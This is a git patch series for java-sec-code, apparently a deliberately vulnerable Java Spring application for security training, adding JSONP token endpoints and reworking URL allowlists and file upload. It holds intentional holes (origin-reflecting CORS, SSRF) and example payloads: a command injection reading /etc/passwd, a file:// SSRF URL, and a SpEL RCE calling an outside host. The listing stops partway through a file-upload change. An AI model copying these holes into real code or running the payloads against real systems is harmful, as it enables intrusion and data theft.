From ab69c0b60c6746476a9c7be3172867000b8fefa2 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 3 Aug 2020 17:17:33 +0800
Subject: [PATCH 01/20] bug fix

---
 README.md                                             |  1 +
 pom.xml                                               |  2 +-
 .../java/org/joychou/config/SafeDomainParser.java     | 11 +++++------
 src/main/java/org/joychou/controller/SSRF.java        |  7 +------
 .../java/org/joychou/controller/URLWhiteList.java     |  7 +++++--
 .../org/joychou/security/CsrfAccessDeniedHandler.java |  7 +++----
 .../java/org/joychou/security/ssrf/SSRFChecker.java   |  2 +-
 src/main/java/org/joychou/util/HttpUtils.java         | 10 ++++++++--
 src/main/resources/templates/index.html               |  1 +
 9 files changed, 26 insertions(+), 22 deletions(-)

diff --git a/README.md b/README.md
index 2c0a0bc8..56d10960 100644
--- a/README.md
+++ b/README.md
@@ -40,6 +40,7 @@ Sort by letter.
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+- [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/pom.xml b/pom.xml
index 6e5c2455..2b273bad 100644
--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
     <groupId>sec</groupId>
     <artifactId>java-sec-code</artifactId>
     <version>1.0.0</version>
-    <packaging>war</packaging>
+    <packaging>jar</packaging>
 
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
diff --git a/src/main/java/org/joychou/config/SafeDomainParser.java b/src/main/java/org/joychou/config/SafeDomainParser.java
index 6157f645..b92ff9eb 100644
--- a/src/main/java/org/joychou/config/SafeDomainParser.java
+++ b/src/main/java/org/joychou/config/SafeDomainParser.java
@@ -29,11 +29,9 @@ public SafeDomainParser() {
         try {
             // 读取resources目录下的文件
             ClassPathResource resource = new ClassPathResource(safeDomainClassPath);
-            File file = resource.getFile();
-
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            Document doc = db.parse(file);  // parse xml
+            Document doc = db.parse(resource.getInputStream());  // parse xml
 
             NodeList rootNode = doc.getElementsByTagName(rootTag);  // 解析根节点domains
             Node domainsNode = rootNode.item(0);
@@ -68,6 +66,7 @@ public SafeDomainParser() {
 
         WebConfig wc = new WebConfig();
         wc.setSafeDomains(safeDomains);
+        logger.info(safeDomains.toString());
         wc.setBlockDomains(blockDomains);
 
         // 解析SSRF配置
@@ -86,11 +85,10 @@ public SafeDomainParser() {
         try {
             // 读取resources目录下的文件
             ClassPathResource resource = new ClassPathResource(ssrfSafeDomainClassPath);
-            File file = resource.getFile();
-
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            Document doc = db.parse(file);  // parse xml
+            // 修复打包成jar包运行，不能读取文件的bug
+            Document doc = db.parse(resource.getInputStream());  // parse xml
 
             NodeList rootNode = doc.getElementsByTagName(ssrfRootTag);  // 解析根节点
             Node domainsNode = rootNode.item(0);
@@ -130,6 +128,7 @@ public SafeDomainParser() {
             logger.error(e.toString());
         }
 
+        logger.info(ssrfBlockIps.toString());
         wc.setSsrfBlockDomains(ssrfBlockDomains);
         wc.setSsrfBlockIps(ssrfBlockIps);
         wc.setSsrfSafeDomains(ssrfSafeDomains);
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index a98c9952..9fdf757f 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -150,23 +150,18 @@ public String ImageIO(@RequestParam String url) {
     }
 
 
-    /**
-     * The default setting of followRedirects is true.
-     * UserAgent is <code>okhttp/2.5.0</code>.
-     */
     @GetMapping("/okhttp/sec")
     public String okhttp(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
-            HttpUtils.okhttp(url);
+            return HttpUtils.okhttp(url);
         } catch (SSRFException | IOException e) {
             return e.getMessage();
         } finally {
             SecurityUtil.stopSSRFHook();
         }
 
-        return "okhttp ssrf test";
     }
 
 
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index b4d3c2f0..e6f9b987 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -6,6 +6,8 @@
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 
+import java.net.MalformedURLException;
+import java.net.URL;
 import java.util.ArrayList;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -92,7 +94,7 @@ public String regex(@RequestParam("url") String url) {
      * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(String url) {
+    public String url_bypass(String url) throws MalformedURLException {
 
         logger.info("url:  " + url);
 
@@ -100,7 +102,8 @@ public String url_bypass(String url) {
             return "Url is not http or https";
         }
 
-        String host = SecurityUtil.gethost(url);
+        URL u = new URL(url);
+        String host = u.getHost();
         logger.info("host:  " + host);
 
         // endsWith .
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index ba9c3f7f..2e1df795 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -7,15 +7,14 @@
 import org.springframework.security.access.AccessDeniedException;
 import org.springframework.security.web.access.AccessDeniedHandler;
 
-
-import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
 /**
- * Design csrf access denied page.
+ * Csrf access denied page.
  *
+ * @author JoyChou
  */
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
@@ -23,7 +22,7 @@ public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
-                       AccessDeniedException accessDeniedException) throws IOException, ServletException {
+                       AccessDeniedException accessDeniedException) throws IOException {
 
         logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" +
                 "Referer: " + request.getHeader("referer"));
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 4ef0f046..01b1b350 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -50,7 +50,7 @@ public static boolean checkURLFckSSRF(String url) {
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
      * url只允许https或者http，并且设置默认连接超时时间。
-     * 该修复方案会主动请求重定向后的链接。最好用Hook方式获取到所有url后，进行判断，代码待续…
+     * 该修复方案会主动请求重定向后的链接。
      *
      * @param url        check的url
      * @param checkTimes 设置重定向检测的最大次数，建议设置为10次
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 571680a2..1f92cfb9 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -146,10 +146,16 @@ public static String Jsoup(String url) {
     }
 
 
-    public static void okhttp(String url) throws IOException {
+    /**
+     * The default setting of followRedirects is true. The option of followRedirects is true.
+     *
+     * UserAgent is <code>okhttp/2.5.0</code>.
+     */
+    public static String okhttp(String url) throws IOException {
         OkHttpClient client = new OkHttpClient();
+        // client.setFollowRedirects(false);
         com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
-        client.newCall(ok_http).execute();
+        return client.newCall(ok_http).execute().body().string();
     }
 
 
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 671045d5..72779b8e 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -8,6 +8,7 @@
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
     <p>
+        <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
         <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;

From 30dd98b81a6795f7f577ae0f2fde56680404395b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 3 Aug 2020 17:49:12 +0800
Subject: [PATCH 02/20] fixes #23

---
 src/main/resources/templates/login.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index dc6ee40f..1a4c4225 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -8,7 +8,7 @@
     <meta name="_csrf_headerName" th:content="${_csrf.headerName}" />
     <meta name="_csrf_parameterName" th:content="${_csrf.parameterName}" />
     <link rel="stylesheet" th:href="@{/css/login.css}" type="text/css" />
-    <script th:src="@{https://code.jquery.com/jquery-3.4.1.min.js}"></script>
+    <script th:src="@{https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js}"></script>
 
     <script>
         window.csrfToken = {

From 37925a8501e258cbd78cd760ed33d134bbd6e574 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 5 Feb 2021 17:29:35 +0800
Subject: [PATCH 03/20] add fastjsonp

---
 pom.xml                                       |  9 ++++
 .../java/org/joychou/config/Constants.java    |  1 +
 .../org/joychou/config/CsrfTokenBean.java     | 18 ++++++++
 .../org/joychou/config/CustomCorsConfig.java  |  2 +-
 .../{security => config}/Object2Jsonp.java    | 16 ++++---
 .../java/org/joychou/controller/Cookies.java  |  4 ++
 .../java/org/joychou/controller/Cors.java     |  4 +-
 .../java/org/joychou/controller/Jsonp.java    | 37 ++++++++++++++--
 .../java/org/joychou/controller/SSRF.java     |  3 ++
 .../java/org/joychou/controller/SpEL.java     |  2 +-
 .../org/joychou/controller/URLWhiteList.java  | 43 +++++--------------
 .../java/org/joychou/filter/ReferFilter.java  |  2 +-
 .../joychou/security/CustomCorsProcessor.java |  7 +--
 src/main/java/org/joychou/util/HttpUtils.java |  5 ++-
 14 files changed, 100 insertions(+), 53 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/CsrfTokenBean.java
 rename src/main/java/org/joychou/{security => config}/Object2Jsonp.java (85%)

diff --git a/pom.xml b/pom.xml
index 2b273bad..6f8f3990 100644
--- a/pom.xml
+++ b/pom.xml
@@ -248,6 +248,15 @@
             <version>2.9.2</version>
         </dependency>
 
+        <!-- https://mvnrepository.com/artifact/org.projectlombok/lombok -->
+        <dependency>
+            <groupId>org.projectlombok</groupId>
+            <artifactId>lombok</artifactId>
+            <version>1.18.16</version>
+            <scope>provided</scope>
+        </dependency>
+
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/config/Constants.java b/src/main/java/org/joychou/config/Constants.java
index ef6ee45e..041f4f80 100644
--- a/src/main/java/org/joychou/config/Constants.java
+++ b/src/main/java/org/joychou/config/Constants.java
@@ -6,4 +6,5 @@ private Constants() {
     }
 
     public static final String REMEMBER_ME_COOKIE = "rememberMe";
+    public static final String ERROR_PAGE = "https://test.joychou.org/error1.html";
 }
diff --git a/src/main/java/org/joychou/config/CsrfTokenBean.java b/src/main/java/org/joychou/config/CsrfTokenBean.java
new file mode 100644
index 00000000..b0698e12
--- /dev/null
+++ b/src/main/java/org/joychou/config/CsrfTokenBean.java
@@ -0,0 +1,18 @@
+package org.joychou.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+
+/**
+ * Reference: https://docs.spring.io/spring-security/site/docs/5.0.x/reference/html/csrf.html
+ */
+
+@Configuration
+public class CsrfTokenBean {
+
+    @Bean
+    public CookieCsrfTokenRepository cookieCsrfTokenRepository() {
+        return CookieCsrfTokenRepository.withHttpOnlyFalse();
+    }
+}
diff --git a/src/main/java/org/joychou/config/CustomCorsConfig.java b/src/main/java/org/joychou/config/CustomCorsConfig.java
index 8b80e664..47d3acea 100644
--- a/src/main/java/org/joychou/config/CustomCorsConfig.java
+++ b/src/main/java/org/joychou/config/CustomCorsConfig.java
@@ -38,7 +38,7 @@ public RequestMappingHandlerMapping getRequestMappingHandlerMapping() {
 
 
     /**
-     * 自定义Cors处理器
+     * 自定义Cors处理器，重写了checkOrigin
      * 自定义校验origin，支持一级域名校验 && 多级域名
      */
     private static class CustomRequestMappingHandlerMapping extends RequestMappingHandlerMapping {
diff --git a/src/main/java/org/joychou/security/Object2Jsonp.java b/src/main/java/org/joychou/config/Object2Jsonp.java
similarity index 85%
rename from src/main/java/org/joychou/security/Object2Jsonp.java
rename to src/main/java/org/joychou/config/Object2Jsonp.java
index 6432616b..64d68205 100644
--- a/src/main/java/org/joychou/security/Object2Jsonp.java
+++ b/src/main/java/org/joychou/config/Object2Jsonp.java
@@ -1,7 +1,7 @@
-package org.joychou.security;
+package org.joychou.config;
 
 import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
@@ -19,6 +19,7 @@
 import javax.servlet.http.HttpServletResponse;
 
 
+
 /**
  * <code>AbstractJsonpResponseBodyAdvice</code> will be removed as of Spring Framework 5.1, use CORS instead.
  * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
@@ -47,7 +48,8 @@ protected void beforeBodyWriteInternal(MappingJacksonValue bodyContainer, MediaT
         HttpServletResponse response = ((ServletServerHttpResponse)res).getServletResponse();
 
         String realJsonpFunc = getRealJsonpFunc(request);
-        if (StringUtils.isNotBlank(realJsonpFunc)){
+        // 如果url带callback，且校验不安全后
+        if ( StringUtils.isNotBlank(realJsonpFunc) ) {
             jsonpReferHandler(request, response);
         }
         super.beforeBodyWriteInternal(bodyContainer, contentType, returnType, req, res);
@@ -84,9 +86,11 @@ private void jsonpReferHandler(HttpServletRequest request, HttpServletResponse r
         if (SecurityUtil.checkURL(refer) == null ){
             logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             try{
-                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
-                response.flushBuffer();
+                // 使用response.getWriter().write后，后续写入jsonp后还会继续使用response.getWriteer()，导致报错
+//                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+//                response.getWriter().write(" Referer check error.");
+//                response.flushBuffer();
+                response.sendRedirect(Constants.ERROR_PAGE);
             } catch (Exception e){
                 logger.error(e.toString());
             }
diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
index f62efb2d..6f0c7be2 100644
--- a/src/main/java/org/joychou/controller/Cookies.java
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -12,6 +12,10 @@
 
 import static org.springframework.web.util.WebUtils.getCookie;
 
+
+/**
+ * 某些应用获取用户身份信息可能会直接从cookie中直接获取明文的nick或者id，导致越权问题。
+ */
 @RestController
 @RequestMapping("/cookie")
 public class Cookies {
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index 870e809f..5b7d9741 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -25,8 +25,8 @@ public class Cors {
     @GetMapping("/vuln/origin")
     public String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
-        response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
-        response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
+        response.setHeader("Access-Control-Allow-Origin", origin); // set origin from header
+        response.setHeader("Access-Control-Allow-Credentials", "true");  // allow cookie
         return info;
     }
 
diff --git a/src/main/java/org/joychou/controller/Jsonp.java b/src/main/java/org/joychou/controller/Jsonp.java
index 96061579..2ab0dcef 100644
--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -3,9 +3,14 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
+import com.alibaba.fastjson.JSONPObject;
+import lombok.extern.slf4j.Slf4j;
+import org.apache.commons.lang.StringUtils;
 import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.servlet.ModelAndView;
@@ -14,6 +19,7 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
@@ -22,12 +28,15 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
+@Slf4j
 @RestController
 @RequestMapping("/jsonp")
 public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
+    @Autowired
+    CookieCsrfTokenRepository cookieCsrfTokenRepository;
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -57,7 +66,7 @@ public String emptyReferer(HttpServletRequest request) {
     }
 
     /**
-     * Adding callback or cback on parameter can automatically return jsonp data.
+     * Adding callback or _callback on parameter can automatically return jsonp data.
      * http://localhost:8080/jsonp/object2jsonp?callback=test
      * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
@@ -101,11 +110,33 @@ public String safecode(HttpServletRequest request) {
         return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
-
+    /**
+     * http://localhost:8080/jsonp/getToken?fastjsonpCallback=aa
+     *
+     * object to jsonp
+     */
     @GetMapping("/getToken")
-    public CsrfToken getCsrfToken(CsrfToken token) {
+    public CsrfToken getCsrfToken1(CsrfToken token) {
         return token;
     }
 
+    /**
+     * http://localhost:8080/jsonp/fastjsonp/getToken?fastjsonpCallback=aa
+     *
+     * fastjsonp to jsonp
+     */
+    @GetMapping(value = "/fastjsonp/getToken", produces = "application/javascript")
+    public String getCsrfToken2(HttpServletRequest request) {
+        CsrfToken csrfToken = cookieCsrfTokenRepository.loadToken(request); // get csrf token
+
+        String callback = request.getParameter("fastjsonpCallback");
+        if (StringUtils.isNotBlank(callback)) {
+            JSONPObject jsonpObj = new JSONPObject(callback);
+            jsonpObj.addParameter(csrfToken);
+            return jsonpObj.toString();
+        } else {
+            return csrfToken.toString();
+        }
+    }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 9fdf757f..8645fd13 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -27,7 +27,10 @@ public class SSRF {
 
 
     /**
+     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
+     *
      * The default setting of followRedirects is true.
+     * Protocol: file ftp mailto http https jar netdoc
      * UserAgent is Java/1.8.0_102.
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 82163ab2..698f4a7e 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -16,7 +16,7 @@
 public class SpEL {
 
     /**
-     * SPEL to RCE
+     * SpEL to RCE
      * http://localhost:8080/spel/vul/?expression=xxx.
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index e6f9b987..35d37576 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -118,13 +118,13 @@ public String url_bypass(String url) throws MalformedURLException {
 
 
     /**
-     * 一级域名白名单 First-level host whitelist.
-     * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
+     * First-level & Multi-level host whitelist.
+     * http://localhost:8080/url/sec?url=http://aa.joychou.org
      */
-    @GetMapping("/sec/endswith")
-    public String sec_endswith(@RequestParam("url") String url) {
+    @GetMapping("/sec")
+    public String sec(@RequestParam("url") String url) {
 
-        String whiteDomainlists[] = {"joychou.org", "joychou.com"};
+        String whiteDomainlists[] = {"joychou.org", "joychou.com", "test.joychou.me"};
 
         if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
@@ -132,42 +132,19 @@ public String sec_endswith(@RequestParam("url") String url) {
 
         String host = SecurityUtil.gethost(url);
 
-        // endsWith .
-        for (String domain : whiteDomainlists) {
-            if (host.endsWith("." + domain)) {
-                return "Good url.";
+        for (String whiteHost: whiteDomainlists){
+            if (whiteHost.startsWith(".") && host.endsWith(whiteHost)) {
+                return url;
+            } else if (!whiteHost.startsWith(".") && host.equals(whiteHost)) {
+                return url;
             }
         }
 
         return "Bad url.";
     }
 
-    /**
-     * 多级域名白名单 Multi-level host whitelist.
-     * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
-     */
-    @GetMapping("/sec/multi_level_host")
-    public String sec_multi_level_host(@RequestParam("url") String url) {
-        String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
-
-        if (!SecurityUtil.isHttp(url)) {
-            return "SecurityUtil is not http or https";
-        }
-
-        String host = SecurityUtil.gethost(url);
-
-        // equals
-        for (String domain : whiteDomainlists) {
-            if (host.equals(domain)) {
-                return "Good url.";
-            }
-        }
-        return "Bad url.";
-    }
-
 
     /**
-     * 多级域名白名单 Multi-level host whitelist.
      * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
      */
     @GetMapping("/sec/array_indexOf")
diff --git a/src/main/java/org/joychou/filter/ReferFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
index da1030e6..30a914f3 100644
--- a/src/main/java/org/joychou/filter/ReferFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -68,7 +68,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
                 logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                         + "Referer: " + refer);
                 response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
+                response.getWriter().write(" Referer check error.");
                 response.flushBuffer();
                 return;
             }
diff --git a/src/main/java/org/joychou/security/CustomCorsProcessor.java b/src/main/java/org/joychou/security/CustomCorsProcessor.java
index cbbad17a..6d67825f 100644
--- a/src/main/java/org/joychou/security/CustomCorsProcessor.java
+++ b/src/main/java/org/joychou/security/CustomCorsProcessor.java
@@ -3,12 +3,9 @@
 import org.apache.commons.lang.StringUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.util.CollectionUtils;
 import org.springframework.web.cors.CorsConfiguration;
 import org.springframework.web.cors.DefaultCorsProcessor;
 
-import java.util.List;
-
 public class CustomCorsProcessor extends DefaultCorsProcessor {
 
     private static final Logger logger = LoggerFactory.getLogger(CustomCorsProcessor.class);
@@ -29,7 +26,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
         if (result != null) {
             return result;
         }
-        // List<String> allowedOrigins = config.getAllowedOrigins();
+
         if (StringUtils.isBlank(requestOrigin)) {
             return null;
         }
@@ -39,7 +36,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
 
 
     /**
-     * 校验requestOrigin
+     * 自定义校验requestOrigin
      */
     private String customCheckOrigin(String requestOrigin) {
 
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 1f92cfb9..4d2be1a4 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -5,6 +5,7 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
+import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -70,6 +71,8 @@ public static String httpClient(String url) {
 
             CloseableHttpClient client = HttpClients.createDefault();
             HttpGet httpGet = new HttpGet(url);
+            // set redirect enable false
+            // httpGet.setConfig(RequestConfig.custom().setRedirectsEnabled(false).build());
             HttpResponse httpResponse = client.execute(httpGet); // send request
             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
 
@@ -91,6 +94,7 @@ public static String URLConnection(String url) {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
+            // BufferedReader in = new BufferedReader(new InputStreamReader(u.openConnection().getInputStream()));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -205,5 +209,4 @@ public static String HttpAsyncClients(String url) {
 
     }
 
-
 }

From bb94a99ac62de94796eb3724708896e7e6d44596 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 25 Feb 2021 10:18:21 +0800
Subject: [PATCH 04/20] fixes #31

---
 java-sec-code.iml                             |  1 +
 .../org/joychou/controller/FileUpload.java    | 56 +++++++++++--------
 src/main/resources/application.properties     |  8 ++-
 src/main/resources/templates/index.html       |  3 +-
 .../resources/templates/uploadStatus.html     | 10 ++++
 5 files changed, 52 insertions(+), 26 deletions(-)
 create mode 100644 src/main/resources/templates/uploadStatus.html

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 720895cc..59b2063d 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -215,5 +215,6 @@
     <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
+    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 8b7c7373..00ab7008 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -31,14 +31,17 @@
 public class FileUpload {
 
     // Save the uploaded file to this folder
-    private static String UPLOADED_FOLDER = "/tmp/";
+    private static final String UPLOADED_FOLDER = "/tmp/";
     private final Logger logger = LoggerFactory.getLogger(this.getClass());
+    private static String randomFilePath = "";
 
-    @GetMapping("/")
+    // uplaod any file
+    @GetMapping("/any")
     public String index() {
         return "upload"; // return upload.html page
     }
 
+    // only allow to upload pictures
     @GetMapping("/pic")
     public String uploadPic() {
         return "uploadPic"; // return uploadPic.html page
@@ -64,13 +67,16 @@ public String singleFileUpload(@RequestParam("file") MultipartFile file,
 
         } catch (IOException e) {
             redirectAttributes.addFlashAttribute("message", "upload failed");
-            e.printStackTrace();
-            return "redirect:/file/status";
+            logger.error(e.toString());
         }
 
         return "redirect:/file/status";
     }
 
+    @GetMapping("/status")
+    public String uploadStatus() {
+        return "uploadStatus";
+    }
 
     // only upload picture
     @PostMapping("/upload/picture")
@@ -83,11 +89,12 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         String fileName = multifile.getOriginalFilename();
         String Suffix = fileName.substring(fileName.lastIndexOf(".")); // 获取文件后缀名
         String mimeType = multifile.getContentType(); // 获取MIME类型
+        String filePath = UPLOADED_FOLDER + fileName;
         File excelFile = convert(multifile);
 
 
         // 判断文件后缀名是否在白名单内  校验1
-        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp", ".ico"};
+        String[] picSuffixList = {".jpg", ".png", ".jpeg", ".gif", ".bmp", ".ico"};
         boolean suffixFlag = false;
         for (String white_suffix : picSuffixList) {
             if (Suffix.toLowerCase().equals(white_suffix)) {
@@ -97,13 +104,13 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         }
         if (!suffixFlag) {
             logger.error("[-] Suffix error: " + Suffix);
-            deleteFile(excelFile);
+            deleteFile(filePath);
